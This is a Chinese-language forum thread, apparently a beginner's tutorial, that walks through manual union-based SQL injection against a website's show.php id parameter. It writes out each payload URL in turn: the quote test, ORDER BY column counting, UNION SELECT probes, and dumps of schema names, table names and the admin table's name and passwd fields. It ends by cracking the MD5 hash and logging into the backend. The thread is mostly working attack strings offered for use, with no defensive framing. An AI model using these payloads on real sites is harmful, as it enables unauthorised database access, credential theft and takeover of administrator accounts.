（小白必看）sql网站渗透纯手工注入思路

墨水带你说娱乐 [1级]   回复于2019-9-10

对你肯定是没价值，但是对小白就不一定了，流星啥子不多就小白多

墨水带你说娱乐 [1级]   回复于2019-9-10

' and ' 1 '= ' 2页面错误，判断该URL存在sql注入

墨水带你说娱乐 [1级]   回复于2019-9-10

接下来通过order by 语句来判断列数也就是字段数 得知列数为16列
语句如下：http://xxoo.com/show.php?cid=25&classid=8&id=44' order by 16%23 页面返回正常 这里%23是#的URL编码起到注释作用

墨水带你说娱乐 [1级]   回复于2019-9-10

接着就是通过union select 联合查询语句查询页面回显位置来暴数据库，表名，字段名，数据等。
语句如下：http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

墨水带你说娱乐 [1级]   回复于2019-9-10

过页面返回得知在2，4，3位置可以返回我们所需要的数据。
暴库语句：http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

墨水带你说娱乐 [1级]   回复于2019-9-10

得到数据库:my4400038，
继续暴my4400038数据库中表。
暴表名语句：http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='my4400038'),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23.

墨水带你说娱乐 [1级]   回复于2019-9-10

继续~~
暴f_admin表中字段名。（图一）

接下里就是暴表中name和passwd数据（图二）

墨水带你说娱乐 [1级]   回复于2019-9-10

语句：http://xxoo.com/show.php?cid=25&classid=8&id=-441' union select 1,(select concat_ws('~~~~~~',name,passwd) from f_admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

账号：admin
最后md5解密:3211003


后台随手一个admin登陆之~~
本篇文件没什么技术含量，只要掌握了sql语句注入的流程，即可轻松拿下，本人也只是业余爱好而已，目前努力学习中教程结束